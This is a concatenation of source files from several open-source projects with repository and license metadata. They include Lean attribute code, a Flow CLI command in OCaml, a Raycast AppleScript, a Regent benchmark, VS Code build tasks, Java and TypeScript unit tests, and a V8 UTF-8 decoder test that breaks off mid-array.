(after_set : option (Π (decl : _root_.name) (prio : nat) (persistent : bool), command) := none)
/- Optional handler that will be called before the attribute is removed from a declaration. -/
(before_unset : option (Π (decl : _root_.name) (persistent : bool), command) := none)
(cache_cfg : user_attribute_cache_cfg cache_ty . user_attribute.dflt_cache_cfg)
[reflect_param : has_reflect param_ty]
/- Parser that will be invoked after parsing the attribute's name. The parse result will be reflected
and stored and can be retrieved with `user_attribute.get_param`. -/
(parser : lean.parser param_ty . user_attribute.dflt_parser)
/- Registers a new user-defined attribute. The argument must be the name of a definition of type
`user_attribute`. -/
meta def attribute.register (decl : name) : command :=
tactic.set_basic_attribute ``user_attribute decl tt
meta constant user_attribute.get_cache {α β : Type} (attr : user_attribute α β) : tactic α
meta def user_attribute.parse_reflect {α β : Type} (attr : user_attribute α β) : lean.parser expr :=
(λ a, attr.reflect_param a) <$> attr.parser
meta constant user_attribute.get_param_untyped {α β : Type} (attr : user_attribute α β) (decl : name)
: tactic expr
meta constant user_attribute.set_untyped {α β : Type} [reflected β] (attr : user_attribute α β) (decl : name)
(val : expr) (persistent : bool) (prio : option nat := none) : tactic unit
meta def user_attribute.get_param {α β : Type} [reflected β] (attr : user_attribute α β) (n : name) : tactic β :=
attr.get_param_untyped n >>= tactic.eval_expr β
meta def user_attribute.set {α β : Type} [reflected β] (attr : user_attribute α β) (n : name)
(val : β) (persistent : bool) (prio : option nat := none) : tactic unit :=
attr.set_untyped n (attr.reflect_param val) persistent prio
open tactic
meta def register_attribute := attribute.register
meta def get_attribute_cache_dyn {α : Type} [reflected α] (attr_decl_name : name) : tactic α :=
let attr : pexpr := expr.const attr_decl_name [] in
do e ← to_expr ``(user_attribute.get_cache %%attr),
t ← eval_expr (tactic α) e,
t
/- Declares and registers a user attribute named `attr_name` whose cached
   value is the `name_set` of all declarations currently tagged with it. -/
meta def mk_name_set_attr (attr_name : name) : command :=
do let t := `(user_attribute name_set),
   let v := `({name := attr_name,
               descr := "name_set attribute",
               cache_cfg := {
                 mk_cache := λ ns, return (name_set.of_list ns),
                 dependencies := []}} : user_attribute name_set),
   add_meta_definition attr_name [] t v,
   register_attribute attr_name
-- Looks up the cached `name_set` of an attribute created via `mk_name_set_attr`.
meta def get_name_set_for_attr (name : name) : tactic name_set :=
get_attribute_cache_dyn name
| Lean | 4 | solson/lean | library/init/meta/attribute.lean | [
"Apache-2.0"
] |
_list 10 "filelist.txt" slist
_list slick load
_list slick load +
0 _list sget load +
-4 ampdb *
| SourcePawn | 0 | aleatoricforest/Sporth | examples/slist.sp | [
"MIT"
] |
(*
* Copyright (c) Facebook, Inc. and its affiliates.
*
* This source code is licensed under the MIT license found in the
* LICENSE file in the root directory of this source tree.
*)
(***********************************************************************)
(* flow get imports command *)
(***********************************************************************)
open CommandUtils
(* Command specification for [flow get-imports]. *)
let spec =
  {
    CommandSpec.name = "get-imports";
    doc = "Get names of all modules imported by one or more given modules";
    usage =
      Printf.sprintf
        (* the usage line previously said "get-requirements"; it now matches
           the command's actual name *)
        "Usage: %s get-imports [OPTION]... [FILE]...\n\nGet names of all modules imported by one or more given modules\n\nExample usage:\n\t%s get-imports FirstModule SecondModule\n"
        CommandUtils.exe_name
        CommandUtils.exe_name;
    args =
      CommandSpec.ArgSpec.(
        empty
        |> base_flags
        |> connect_and_json_flags
        |> root_flag
        |> strip_root_flag
        |> from_flag
        |> wait_for_recheck_flag
        |> anon "modules" (required (list_of string))
      );
  }
(* Implementation of [flow get-imports]: asks the server for the imports of
   each named module and prints them either as text or as JSON. *)
let main base_flags option_values json pretty root strip_root wait_for_recheck modules () =
  let flowconfig_name = base_flags.Base_flags.flowconfig_name in
  let root = guess_root flowconfig_name root in
  let request = ServerProt.Request.GET_IMPORTS { module_names = modules; wait_for_recheck } in
  let (requirements_map, non_flow) =
    match connect_and_make_request flowconfig_name option_values root request with
    | ServerProt.Response.GET_IMPORTS response -> response
    | response -> failwith_bad_response ~request ~response
  in
  (* Normalize each module's requirements into an association list of
     (imported name, locations), relativizing file paths when requested. *)
  let requirements_map =
    SMap.fold
      begin
        fun module_name reqlocs map ->
          let requirements =
            Modulename.Map.fold
              (fun req loc assoc ->
                let req =
                  match req with
                  | Modulename.String s -> s
                  | Modulename.Filename f ->
                    let f = File_key.to_string f in
                    if strip_root then
                      Files.relative_path (Path.to_string root) f
                    else
                      f
                in
                (req, loc) :: assoc)
              reqlocs
              []
          in
          SMap.add module_name requirements map
      end
      requirements_map
      SMap.empty
  in
  (* Rebind strip_root as the option the printers below expect. *)
  let strip_root =
    if strip_root then
      Some root
    else
      None
  in
  if json || pretty then
    Hh_json.(
      (* Non-Flow modules: marked "not_flow" with an empty requirements list. *)
      let json_non_flow =
        SSet.fold
          (fun module_name acc ->
            let json =
              JSON_Object [("not_flow", JSON_Bool true); ("requirements", JSON_Array [])]
            in
            (module_name, json) :: acc)
          non_flow
          []
      in
      (* Flow modules: one entry per import location. *)
      let json_imports =
        SMap.fold
          (fun module_name assoc acc ->
            let requirements =
              List.fold_left
                (fun acc (req, locs) ->
                  Nel.fold_left
                    (fun acc loc ->
                      JSON_Object
                        (("import", JSON_String req)
                        ::
                        ("loc", json_of_loc_with_offset ~strip_root loc)
                        :: Errors.deprecated_json_props_of_loc ~strip_root loc
                        )
                      :: acc)
                    acc
                    locs)
                []
                assoc
            in
            let json =
              JSON_Object [("not_flow", JSON_Bool false); ("requirements", JSON_Array requirements)]
            in
            (module_name, json) :: acc)
          requirements_map
          []
      in
      let json = JSON_Object (List.append json_non_flow json_imports) in
      print_json_endline ~pretty json
    )
  else
    (* Plain-text output: one header per module, one tab-indented line per
       import with its source range. *)
    let print_imports module_name =
      if SMap.mem module_name requirements_map then (
        let requirements = SMap.find module_name requirements_map in
        Printf.printf "Imports for module '%s':\n" module_name;
        List.iter
          (fun (req, locs) ->
            Nel.iter
              (fun loc ->
                let loc_str = range_string_of_loc ~strip_root loc in
                Printf.printf "\t%s@%s\n" req loc_str)
              locs)
          requirements
      ) else if SSet.mem module_name non_flow then
        Printf.printf
          "Cannot obtain imports for module '%s' because is not\ marked for processing by flow!\n"
          module_name
      else
        Printf.printf "Module '%s' could not be found!\n" module_name
    in
    List.iter print_imports modules;
    flush stdout

(* Wire the spec and implementation into a runnable CLI command. *)
let command = CommandSpec.command spec main
| OCaml | 4 | zhangmaijun/flow | src/commands/getImportsCommand.ml | [
"MIT"
] |
#!/usr/bin/osascript
# Required parameters:
# @raycast.schemaVersion 1
# @raycast.title Search Note By Name
# @raycast.mode silent
# Optional parameters:
# @raycast.icon ./images/notes.png
# @raycast.argument1 { "type": "text", "placeholder": "Exact Note Name or a Substring" }
# @raycast.packageName Notes
# Documentation:
# @raycast.description This script searches for a note, given its exact name, or a substring, the search does not consider case
# if two notes or more have the same given substring the script will always show the first one
# @raycast.author Ayoub Gharbi
# @raycast.authorURL github.com/ayoub-g
-- Searches every Notes folder for the first note whose name contains the
-- given text (AppleScript's "is in" comparison ignores case by default)
-- and shows it. Folders with no notes are now skipped safely: the original
-- read `item 1 of note_names` before checking the list length, which
-- raised an error on an empty folder.
on run argv
	set note_to_search to (item 1 of argv)
	tell application "Notes"
		activate
		set note_found to false
		set folders_count to (count of folders)
		repeat with folder_index from 1 to folders_count
			set note_names to (name of notes of folder folder_index)
			-- "from 1 to 0" runs zero times, so empty folders are harmless.
			repeat with note_index from 1 to (count of note_names)
				set note_name to item note_index of note_names
				if note_to_search is in note_name then
					show note note_name
					set note_found to true
					exit repeat
				end if
			end repeat
			if note_found then exit repeat
		end repeat
	end tell
end run
"MIT"
] |
-- Copyright (c) 2015, NVIDIA CORPORATION. All rights reserved.
--
-- Redistribution and use in source and binary forms, with or without
-- modification, are permitted provided that the following conditions
-- are met:
-- * Redistributions of source code must retain the above copyright
-- notice, this list of conditions and the following disclaimer.
-- * Redistributions in binary form must reproduce the above copyright
-- notice, this list of conditions and the following disclaimer in the
-- documentation and/or other materials provided with the distribution.
-- * Neither the name of NVIDIA CORPORATION nor the names of its
-- contributors may be used to endorse or promote products derived
-- from this software without specific prior written permission.
--
-- THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY
-- EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-- IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
-- PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-- CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
-- EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
-- PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
-- PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
-- OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-- (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-- OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import "regent"
-- Compile and link helpers
local cinc
do
local root_dir = arg[0]:match(".*/") or "./"
local runtime_dir = root_dir .. "../../runtime"
local inc_cc = root_dir .. "inc.cc"
local inc_so = os.tmpname() .. ".so" -- root_dir .. "inc.so"
local cxx = os.getenv('CXX') or 'c++'
local cxx_flags = "-O2 -std=c++0x -Wall -Werror"
if os.execute('test "$(uname)" = Darwin') == 0 then
cxx_flags =
(cxx_flags ..
" -dynamiclib -single_module -undefined dynamic_lookup -fPIC")
else
cxx_flags = cxx_flags .. " -shared -fPIC"
end
local cmd = (cxx .. " " .. cxx_flags .. " -I " .. runtime_dir .. " " ..
inc_cc .. " -o " .. inc_so)
if os.execute(cmd) ~= 0 then
print("Error: failed to compile " .. inc_cc)
assert(false)
end
terralib.linklibrary(inc_so)
cinc = terralib.includec("inc.h", {"-I", root_dir, "-I", runtime_dir})
end
local c = regentlib.c
-- Utility functions
function raw(t)
return terra(x : t) return x.__ptr end
end
terra nop() end
terra min(x : int64, y : int64) : int64
if x < y then
return x
else
return y
end
end
terra ite(c : bool, x : int64, y : int64) : int64
if c then
return x
else
return y
end
end
-- Tasks
__demand(__cuda)
task inc(r: region(int64), y : int64)
where
reads(r), writes(r)
do
__demand(__vectorize)
for x in r do
@x += y
end
end
task inc1(r : region(int64), p : partition(disjoint, r), m : int64, y : int64)
where
reads(r), writes(r)
do
__demand(__parallel)
for i = 0, m do
inc(p[i], y)
end
end
task inc2(r : region(int64), p : partition(disjoint, r), m : int64, y : int64)
where
reads(r), writes(r)
do
__demand(__parallel)
for i = 0, m do
inc(p[i], y)
end
__demand(__parallel)
for i = 0, m do
inc(p[i], y)
end
end
__demand(__cuda)
task dummy(r : region(int64))
where reads(r) do
return 0
end
task dummy1(r : region(int64), p : partition(disjoint, r), m : int64)
where reads(r) do
var x = 0
__demand(__parallel)
for i = 0, m do
x += dummy(p[i])
end
return x
end
terra bulk_allocate(runtime : c.legion_runtime_t,
ctx : c.legion_context_t,
r : c.legion_logical_region_t,
n : int64)
var is = r.index_space
var a = c.legion_index_allocator_create(runtime, ctx, is)
c.legion_index_allocator_alloc(a, n)
c.legion_index_allocator_destroy(a)
end
terra bulk_coloring(n : int64, m : int64) : c.legion_coloring_t
var ic = c.legion_coloring_create()
var npercolor = n/m
for color = 0, m do
var start = color*npercolor + min(color, n%m)
var pieces = npercolor + ite(color < n%m, 1, 0)
c.legion_coloring_add_range(
ic, color,
c.legion_ptr_t { value = start },
c.legion_ptr_t { start+pieces-1 })
end
return ic
end
terra wait_for(x : int)
return x
end
task test(n: int64, m : int64)
var r = region(ispace(ptr, n), int64)
c.printf("allocating...\n")
bulk_allocate(__runtime(), __context(), __raw(r), n)
c.printf("coloring...\n")
var rc = bulk_coloring(n, m)
c.printf("partitioning...\n")
var p = partition(disjoint, r, rc)
c.legion_coloring_destroy(rc)
c.printf("initializing...\n")
var i2 = 0
for x in r do
@x = i2
nop() -- FIXME: Codegen messes up without this.
i2 += 1
end
-- Warmup
c.printf("warmup...\n")
inc1(r, p, m, 0)
nop() -- FIXME: Avoid task fusion here.
inc2(r, p, m, 0)
nop() -- FIXME: Avoid task fusion here.
wait_for(dummy1(r, p, m))
-- Timed runs
c.printf("timing inc1...\n")
var start_time = c.legion_get_current_time_in_micros()/1.e6
inc1(r, p, m, 100)
nop() -- FIXME: Avoid task fusion here.
wait_for(dummy1(r, p, m))
var end_time = c.legion_get_current_time_in_micros()/1.e6
var total_time = end_time - start_time
c.printf("inc1 elapsed time = %.6e\n", total_time)
c.printf("inc1 bandwidth = %.6e\n", n*[sizeof(int64)]*2 / total_time)
c.printf("inc1 iops = %.6e\n", n / total_time)
c.printf("timing inc2...\n")
start_time = c.legion_get_current_time_in_micros()/1.e6
inc2(r, p, m, 10)
nop() -- FIXME: Avoid task fusion here.
wait_for(dummy1(r, p, m))
end_time = c.legion_get_current_time_in_micros()/1.e6
total_time = end_time - start_time
c.printf("inc2 elapsed time = %.6e\n", total_time)
c.printf("inc2 bandwidth = %.6e\n", n*[sizeof(int64)]*2 / total_time)
c.printf("inc2 iops = %.6e\n", n*2 / total_time)
c.printf("validating...\n")
var i3 : int64 = 0
for x in r do
var y = @x
var z = 120 + i3
if y ~= z then c.printf("output %ld is %ld\n", i3, y) end
regentlib.assert(y == z, "test failed")
i3 += 1
end
end
task main()
-- test(16777216, 2) -- 128 MB
-- test(33554432, 4) -- 256 MB
-- test(67108864, 8) -- 512 MB
-- test(134217728, 16) -- 1 GB
test(268435456, 32) -- 2 GB
-- test(536870912, 64) -- 4 GB
end
cinc.register_mappers()
regentlib.start(main)
| Rouge | 5 | rupanshusoi/rdir | examples/inc.rg | [
"Apache-2.0",
"BSD-3-Clause"
] |
fileFormatVersion: 2
guid: 8b12ac54c5224758af88c67e2af4a01e
timeCreated: 1604359666 | Unity3D Asset | 0 | cihan-demir/NineMensMorris | MLPYthonEnv/ml-agents-release_17/com.unity.ml-agents/Runtime/Analytics.meta | [
"MIT"
] |
//
// DoraemonMCXPath.h
// DoraemonKit-DoraemonKit
//
// Created by litianhao on 2021/7/13.
//
#import <UIKit/UIKit.h>
NS_ASSUME_NONNULL_BEGIN
@interface DoraemonMCXPathNode : NSObject
// 控件在父视图上的索引
@property (nonatomic , assign) NSUInteger index;
// 控件的类名
@property (nonatomic , copy) NSString *className;
+ (instancetype)nodeWithString:(NSString *)string;
@end
@interface DoraemonMCXPathSerializer : NSObject
/// 当前控件是否在复用模式容器的单元格 例如:UITableViewCell, UICollectionViewCell
@property (nonatomic , assign) BOOL isOneCell ;
/// 如果isOneCell为true , 这个字段有值 列表容器的XPath 例如 UITableView , UICollectionView
@property (nonatomic , strong , readonly) NSArray<DoraemonMCXPathNode *> *listContainerPathNodeList;
/// 如果isOneCell为true , 这个字段有值 代表当前控件所在cell在列表容器中的索引
@property (nonatomic , strong ) NSIndexPath *cellIndexPath;
/// 从根window到当前控件的XPath 如果isOneCell为true , 就代表从listContainer到当前控件的XPath
@property (nonatomic , copy , readonly) NSArray<DoraemonMCXPathNode *> *pathNodeList;
/// 控件所在window在当前所有window数组的索引
@property (nonatomic , assign) NSInteger windowIndex;
/// 控件所在window的类名
@property (nonatomic , copy ) NSString *windowClsName;
/// 控件所在window的根控制器类名
@property (nonatomic , copy ) NSString *windowRootVCClsName;
/// 默认false
@property (nonatomic , assign) BOOL ignore;
/// 控件所在控制器类名
@property (nonatomic , weak ) UIViewController *vcCls;
/// 根据控件获取XPath描述对象
+ (instancetype )xPathInstanceWithView:(UIView *)view;
/// 解析网络上传过来的xpath字符串信息,生成xPath对象
+ (instancetype)xPathInstanceFromXpath:(NSString *)xpath;
/// 根据控件获取XPath在网络上传输的字符串
+ (NSString *)xPathStringWithView:(UIView *)view ;
/// 根据网络上传过来的xpath字符串还原uiview
+ (UIView *)viewFromXpath:(NSString *)xpath;
/// 根据当前信息生成xPath在网络上传输的字符串
- (NSString *)generalPathToTransfer;
/// 根据当前的xPath信息查找到对应的view
- (UIView *)fetchView;
// 获取view所在控制器
+ (UIViewController *)ownerVCWithView:(UIView *)view ;
@end
NS_ASSUME_NONNULL_END
| C | 4 | didichuxing/DoraemonKit | iOS/DoraemonKit/Src/MultiControl/Function/EventSync/Serialize/XPath/DoraemonMCXPathSerializer.h | [
"Apache-2.0"
] |
{
// Note!
// Set the value used for ${config:chrome.outputDir} in your settings.json
// file with a line like:
// "chrome.outputDir": "/path/to/chromium/src/out/current_link",
// Then run "0-set_chrome_output_directory" to set the `current_link`
// symbolic link (see below).
"version": "2.0.0",
"runner": "terminal",
// The default problem matcher matches build output, which is useful for most tasks.
"problemMatcher": [
{
"owner": "cpp",
"fileLocation": ["relative", "${config:chrome.outputDir}"],
"pattern": {
"regexp": "^(gen/.*):(\\d+):(\\d+):\\s+(warning|\\w*\\s?error):\\s+(.*)$",
"file": 1, "line": 2, "column": 3, "severity": 4, "message": 5
}
},
{
"owner": "cpp",
"fileLocation": ["relative", "${workspaceRoot}"],
"pattern": {
"regexp": "^../../(.*):(\\d+):(\\d+):\\s+(warning|\\w*\\s?error):\\s+(.*)$",
"file": 1, "line": 2, "column": 3, "severity": 4, "message": 5
}
},
{
"owner": "cpp",
"fileLocation": ["relative", "${config:chrome.outputDir}"],
"pattern": {
"regexp": "^(gen/.*?):(.*):\\s+(warning|\\w*\\s?error):\\s+(.*)$",
"file": 1, "severity": 3, "message": 4
}
},
{
"owner": "cpp",
"fileLocation": ["relative", "${workspaceRoot}"],
"pattern": {
"regexp": "^../../(.*?):(.*):\\s+(warning|\\w*\\s?error):\\s+(.*)$",
"file": 1, "severity": 3, "message": 4
}
}
],
"options": {
// It's important to set the CWD to the output directory so that file paths
// are linked correctly in the terminal output.
"cwd": "${config:chrome.outputDir}"
},
"inputs": [
{
// See 'Set Chrome Output Directory'.
"type": "pickString",
"id": "chromeOutputDir",
"description": "Chrome output directory:",
// Configure this to point to all the output directories you use.
"options": [
"/path/to/chromium/src/out/pc",
"/path/to/chromium/src/out/Debug",
"/path/to/chromium/src/out/Debug_x86"
]
},
{
"type": "promptString",
"id": "gtestFilter",
"description": "Filter for 4-test_current_file_with_filter",
"default": "*"
}
],
"tasks": [
// Set the Chrome output directory to be used in future task runs.
// This uses a symbolic link to remember the current output directory.
// If you want to use this, make sure chrome.outputDir is configured to
// point to the link created at ${workspaceFolder}/out/current_link.
// Alternatively:
// * If you want to be prompted for the output directory each
// time you run a command, replace
// ${config:chrome.outputDir}
// with
// ${input:chromeOutputDir}
// everywhere in this file.
//
// * If you want to have different tasks for different output directories,
// just create duplicate tasks and hard-code the output directory used.
{
"label": "0-set_chrome_output_directory",
"command": "rm -f ${workspaceFolder}/out/current_link; ln -s ${input:chromeOutputDir} ${workspaceFolder}/out/current_link",
"type": "shell",
// The default problem matcher doesn't make sense here, so remove it.
"problemMatcher": [],
"options": {
"cwd": "${workspaceFolder}"
}
},
// Some general-purpose build and test tasks. These all inherit the
// problemMatcher at the top of the file.
{
"label": "1-build_chrome",
"type": "shell",
"command": "autoninja -C ${config:chrome.outputDir} chrome",
"group": "test"
},
{
"label": "2-build_all",
"type": "shell",
"command": "autoninja -C ${config:chrome.outputDir}"
},
{
"label": "3-test_current_file",
"type": "shell",
"command": "${workspaceFolder}/tools/autotest.py -C ${config:chrome.outputDir} --run-all ${file}"
},
{
"label": "4-test_current_file_with_filter",
"type": "shell",
"command": "${workspaceFolder}/tools/autotest.py -C ${config:chrome.outputDir} --gtest_filter ${input:gtestFilter} ${file}"
},
{
"label": "5-test_current_line",
"type": "shell",
"command": "${workspaceFolder}/tools/autotest.py -C ${config:chrome.outputDir} --line ${lineNumber} ${file}"
},
{
"label": "6-test_current_directory",
"type": "shell",
"command": "${workspaceFolder}/tools/autotest.py -C ${config:chrome.outputDir} --run-all ${fileDirname}"
},
{
"label": "7-build_current_file",
"type": "shell",
"command": "compile_single_file --build-dir=${config:chrome.outputDir} --file-path=${file}"
},
// Some more specific build tasks, which hard-code the output directory.
{
"label": "8-build_chrome_debug",
"type": "shell",
"command": "autoninja -C ${workspaceFolder}/out/Debug chrome"
},
{
"label": "9-build_chrome_release",
"type": "shell",
"command": "autoninja -C ${workspaceFolder}/out/Release chrome"
},
{
"label": "10-build_test_debug",
"type": "shell",
"command": "autoninja -C ${workspaceFolder}/out/Debug unit_tests components_unittests browser_tests"
},
{
"label": "11-generate_compile_commands",
"type": "shell",
"command": "${workspaceFolder}/tools/clang/scripts/generate_compdb.py -p ${config:chrome.outputDir} > ${workspaceFolder}/compile_commands.json"
}
]
}
| JSON5 | 4 | zealoussnow/chromium | tools/vscode/tasks.json5 | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] |
/**
* @license
* Copyright Google LLC All Rights Reserved.
*
* Use of this source code is governed by an MIT-style license that can be
* found in the LICENSE file at https://angular.io/license
*/
import {interval, merge, Observable} from 'rxjs';
import {map, take} from 'rxjs/operators';
import {asyncTest} from '../test-util';
describe('Observable.merge', () => {
let log: any[];
beforeEach(() => {
log = [];
});
it('merge func callback should run in the correct zone', asyncTest((done: any) => {
const constructorZone1: Zone = Zone.current.fork({name: 'Constructor Zone1'});
const constructorZone2: Zone = Zone.current.fork({name: 'Constructor Zone2'});
const constructorZone3: Zone = Zone.current.fork({name: 'Constructor Zone3'});
const subscriptionZone: Zone = Zone.current.fork({name: 'Subscription Zone'});
const observable1: any = constructorZone1.run(() => {
return interval(8).pipe(map(v => 'observable1' + v), take(1));
});
const observable2: any = constructorZone2.run(() => {
return interval(10).pipe(map(v => 'observable2' + v), take(1));
});
const observable3: any = constructorZone3.run(() => {
return merge(observable1, observable2);
});
subscriptionZone.run(() => {
const subscriber = observable3.subscribe(
(result: any) => {
log.push(result);
expect(Zone.current.name).toEqual(subscriptionZone.name);
},
() => {
fail('should not call error');
},
() => {
log.push('completed');
expect(Zone.current.name).toEqual(subscriptionZone.name);
expect(log).toEqual(['observable10', 'observable20', 'completed']);
done();
});
});
}, Zone.root));
});
| TypeScript | 4 | raghavendramohan/angular | packages/zone.js/test/rxjs/rxjs.merge.spec.ts | [
"MIT"
] |
/*
* Copyright 2002-2019 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.context.expression;
import java.lang.reflect.Method;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;
import org.junit.jupiter.api.Test;
import org.springframework.expression.Expression;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.util.ReflectionUtils;
import static org.assertj.core.api.Assertions.assertThat;
import static org.mockito.Mockito.spy;
import static org.mockito.Mockito.times;
import static org.mockito.Mockito.verify;
/**
* @author Stephane Nicoll
*/
public class CachedExpressionEvaluatorTests {
private final TestExpressionEvaluator expressionEvaluator = new TestExpressionEvaluator();
@Test
public void parseNewExpression() {
Method method = ReflectionUtils.findMethod(getClass(), "toString");
Expression expression = expressionEvaluator.getTestExpression("true", method, getClass());
hasParsedExpression("true");
assertThat(expression.getValue()).isEqualTo(true);
assertThat(expressionEvaluator.testCache.size()).as("Expression should be in cache").isEqualTo(1);
}
@Test
public void cacheExpression() {
Method method = ReflectionUtils.findMethod(getClass(), "toString");
expressionEvaluator.getTestExpression("true", method, getClass());
expressionEvaluator.getTestExpression("true", method, getClass());
expressionEvaluator.getTestExpression("true", method, getClass());
hasParsedExpression("true");
assertThat(expressionEvaluator.testCache.size()).as("Only one expression should be in cache").isEqualTo(1);
}
@Test
public void cacheExpressionBasedOnConcreteType() {
Method method = ReflectionUtils.findMethod(getClass(), "toString");
expressionEvaluator.getTestExpression("true", method, getClass());
expressionEvaluator.getTestExpression("true", method, Object.class);
assertThat(expressionEvaluator.testCache.size()).as("Cached expression should be based on type").isEqualTo(2);
}
private void hasParsedExpression(String expression) {
verify(expressionEvaluator.getParser(), times(1)).parseExpression(expression);
}
private static class TestExpressionEvaluator extends CachedExpressionEvaluator {
private final Map<ExpressionKey, Expression> testCache = new ConcurrentHashMap<>();
public TestExpressionEvaluator() {
super(mockSpelExpressionParser());
}
public Expression getTestExpression(String expression, Method method, Class<?> type) {
return getExpression(this.testCache, new AnnotatedElementKey(method, type), expression);
}
private static SpelExpressionParser mockSpelExpressionParser() {
SpelExpressionParser parser = new SpelExpressionParser();
return spy(parser);
}
}
}
| Java | 5 | nicchagil/spring-framework | spring-context/src/test/java/org/springframework/context/expression/CachedExpressionEvaluatorTests.java | [
"Apache-2.0"
] |
diff --git a/configure b/configure
index 86801281..ed2f7998 100755
--- a/configure
+++ b/configure
@@ -398,7 +398,7 @@ test "$debug" = yes && CFLAGS_AUTO=-g
#
printf "checking whether we should preprocess assembly to add debugging information... "
if fnmatch '-g*|*\ -g*' "$CFLAGS_AUTO $CFLAGS" &&
- test -f "tools/add-cfi.$ARCH.awk" &&
+ test -f "$srcdir/tools/add-cfi.$ARCH.awk" &&
printf ".file 1 \"srcfile.s\"\n.line 1\n.cfi_startproc\n.cfi_endproc" | $CC -g -x assembler -c -o /dev/null 2>/dev/null -
then
ADD_CFI=yes
| Diff | 3 | ohno418/rust | src/ci/docker/scripts/musl-patch-configure.diff | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
// Copyright 2016 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include <memory>
#include <string>
#include <vector>
#include "src/base/vector.h"
#include "src/strings/unicode-decoder.h"
#include "src/strings/unicode-inl.h"
#include "testing/gtest/include/gtest/gtest.h"
namespace v8 {
namespace internal {
namespace {
void DecodeNormally(const std::vector<byte>& bytes,
std::vector<unibrow::uchar>* output) {
size_t cursor = 0;
while (cursor < bytes.size()) {
output->push_back(
unibrow::Utf8::ValueOf(bytes.data() + cursor, bytes.size(), &cursor));
}
}
void DecodeUtf16(const std::vector<uint8_t>& bytes,
std::vector<unibrow::uchar>* output) {
auto utf8_data = base::Vector<const uint8_t>::cast(base::VectorOf(bytes));
Utf8Decoder decoder(utf8_data);
std::vector<uint16_t> utf16(decoder.utf16_length());
decoder.Decode(utf16.data(), utf8_data);
// Decode back into code points
for (size_t i = 0; i < utf16.size(); i++) {
uint16_t b = utf16[i];
if (unibrow::Utf16::IsLeadSurrogate(b)) {
output->push_back(unibrow::Utf16::CombineSurrogatePair(b, utf16[++i]));
} else {
output->push_back(b);
}
}
}
void DecodeIncrementally(const std::vector<byte>& bytes,
std::vector<unibrow::uchar>* output) {
unibrow::Utf8::Utf8IncrementalBuffer buffer = 0;
unibrow::Utf8::State state = unibrow::Utf8::State::kAccept;
const byte* cursor = bytes.data();
const byte* end = bytes.data() + bytes.size();
while (cursor < end) {
unibrow::uchar result =
unibrow::Utf8::ValueOfIncremental(&cursor, &state, &buffer);
if (result != unibrow::Utf8::kIncomplete) {
output->push_back(result);
}
}
unibrow::uchar result = unibrow::Utf8::ValueOfIncrementalFinish(&state);
if (result != unibrow::Utf8::kBufferEmpty) {
output->push_back(result);
}
}
} // namespace
TEST(UnicodeTest, Utf16BufferReuse) {
// Not enough continuation bytes before string ends.
struct TestCase {
std::vector<byte> bytes;
std::vector<unibrow::uchar> unicode_expected;
};
TestCase data[] = {
{{0x00}, {0x0}},
{{0xC2, 0x80}, {0x80}},
{{0xE0, 0xA0, 0x80}, {0x800}},
{{0xF0, 0x90, 0x80, 0x80}, {0x10000}},
{{0xE0, 0xA0, 0x80}, {0x800}},
{{0xC2, 0x80}, {0x80}},
{{0x00}, {0x0}},
};
for (auto test : data) {
// For figuring out which test fails:
fprintf(stderr, "test: ");
for (auto b : test.bytes) {
fprintf(stderr, "%x ", b);
}
fprintf(stderr, "\n");
std::vector<unibrow::uchar> output_utf16;
DecodeUtf16(test.bytes, &output_utf16);
CHECK_EQ(output_utf16.size(), test.unicode_expected.size());
for (size_t i = 0; i < output_utf16.size(); ++i) {
CHECK_EQ(output_utf16[i], test.unicode_expected[i]);
}
}
}
TEST(UnicodeTest, SurrogateOverrunsBuffer) {
std::vector<unibrow::uchar> output_utf16;
// Not enough continuation bytes before string ends.
DecodeUtf16({0x00, 0xF0, 0x90, 0x80, 0x80, 0x00}, &output_utf16);
CHECK_EQ(output_utf16[0], 0x00);
CHECK_EQ(output_utf16[1], 0x10000);
CHECK_EQ(output_utf16[0], 0x00);
}
TEST(UnicodeTest, IncrementalUTF8DecodingVsNonIncrementalUtf8Decoding) {
// Unfortunately, V8 has two UTF-8 decoders. This test checks that they
// produce the same result. This test was inspired by
// https://www.cl.cam.ac.uk/~mgk25/ucs/examples/UTF-8-test.txt .
struct TestCase {
std::vector<byte> bytes;
std::vector<unibrow::uchar> unicode_expected;
};
TestCase data[] = {
// Correct UTF-8 text.
{{0xCE, 0xBA, 0xE1, 0xBD, 0xB9, 0xCF, 0x83, 0xCE, 0xBC, 0xCE, 0xB5},
{0x3BA, 0x1F79, 0x3C3, 0x3BC, 0x3B5}},
// First possible sequence of a certain length:
// 1 byte
{{0x00}, {0x0}},
// 2 bytes
{{0xC2, 0x80}, {0x80}},
// 3 bytes
{{0xE0, 0xA0, 0x80}, {0x800}},
// 4 bytes
{{0xF0, 0x90, 0x80, 0x80}, {0x10000}},
// 5 bytes (not supported)
{{0xF8, 0x88, 0x80, 0x80, 0x80},
